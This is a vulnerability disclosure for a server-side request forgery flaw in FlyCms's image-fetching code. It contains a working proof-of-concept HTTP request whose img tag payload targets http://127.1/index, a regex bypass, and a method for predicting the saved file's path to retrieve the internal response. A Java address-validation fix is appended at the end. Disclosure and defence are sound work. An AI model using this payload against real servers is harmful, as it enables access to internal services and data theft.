An issue was discovered in FlyCms. There is a security vulnerability in the saveUrlAs() function of /Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java that results in SSRF (Server-Side Request Forgery): the ability to create requests from the vulnerable server to the intranet or the internet. The request is sent as follows:
POST /ucenter/question/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/question/add
Content-Length: 93
Cookie: CFID=3; CFTOKEN=50139797; ECS[visit_times]=1; bgC_sid=P5rfbe; JSESSIONID=node01jp6c3qjsftrz1xa81ovh47bff0.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1560325064; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1560328852; FlyCmsId=593f391df8a70cab630e34efa645c590
Connection: close

title=ssrf10&content=%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E&tags=ssrf7&price=0
We can see that adding a question calls replaceContent to fetch the remote image.
In the function replaceContent, we can use 127.1 to bypass the regex, or request other URLs directly; saveUrlAs is called here.
Finally, HttpURLConnection results in SSRF.
Still in replaceContent, we can find the file path and file name. The addQuesion call ultimately fails, but the file is still created.
The file path is today's date, for example /upload/content/2019/6/12/
The file name is the concatenation md5(date + filenum) + filenum + extension
The 16-character MD5 result is characters 8-24 of the 32-character MD5 result.
We can get the server time from the response and, after converting the time zone, calculate the result.
So the file name is 43EC4555543DEFC6_0. and the absolute path is /upload/content/2019/6/12/43EC4555543DEFC6_0.
Requesting that path downloads the file named 43EC4555543DEFC6_0.
This is the SSRF result.
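A destination check that could run before the server-side fetch described above, deciding on the resolved address instead of matching the host string with a regex. This is an added example, not FlyCms code: the class `RemoteImageUrlCheck`, its methods and the sample URLs are hypothetical.

```java
import java.net.Inet6Address;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.UnknownHostException;

// Added example: RemoteImageUrlCheck is a hypothetical class, not FlyCms code.
public class RemoteImageUrlCheck {

    // Reject loopback, wildcard, link-local, RFC 1918 and multicast targets,
    // plus IPv6 unique-local fc00::/7, which isSiteLocalAddress() does not cover.
    static boolean isInternal(InetAddress a) {
        if (a.isLoopbackAddress() || a.isAnyLocalAddress() || a.isLinkLocalAddress()
                || a.isSiteLocalAddress() || a.isMulticastAddress()) {
            return true;
        }
        return a instanceof Inet6Address && (a.getAddress()[0] & 0xfe) == 0xfc;
    }

    // Decide on the resolved addresses, never on the host string: "127.1",
    // "localhost" and a DNS name pointing at 10.0.0.5 all end up rejected here.
    static boolean isAllowed(String url) {
        try {
            URL u = new URL(url);
            String scheme = u.getProtocol();
            if (!scheme.equalsIgnoreCase("http") && !scheme.equalsIgnoreCase("https")) {
                return false;
            }
            for (InetAddress a : InetAddress.getAllByName(u.getHost())) {
                if (isInternal(a)) {
                    return false;
                }
            }
            return true;
        } catch (MalformedURLException | UnknownHostException e) {
            return false; // fail closed on anything that cannot be parsed or resolved
        }
    }

    public static void main(String[] args) {
        // Constructed sample inputs; literal addresses only, so no DNS lookup is needed.
        String[] samples = { "http://127.1/index", "http://10.0.0.5/a.png",
                "file:///etc/passwd", "http://93.184.216.34/a.png" };
        for (String s : samples) {
            System.out.println(s + " -> " + (isAllowed(s) ? "fetch" : "reject"));
        }
    }
}
```

The check and the later connection resolve the host separately, so the fetch should connect to the address that was validated and disable redirects with `setInstanceFollowRedirects(false)`, otherwise a redirect or a changed DNS answer can still reach an internal target.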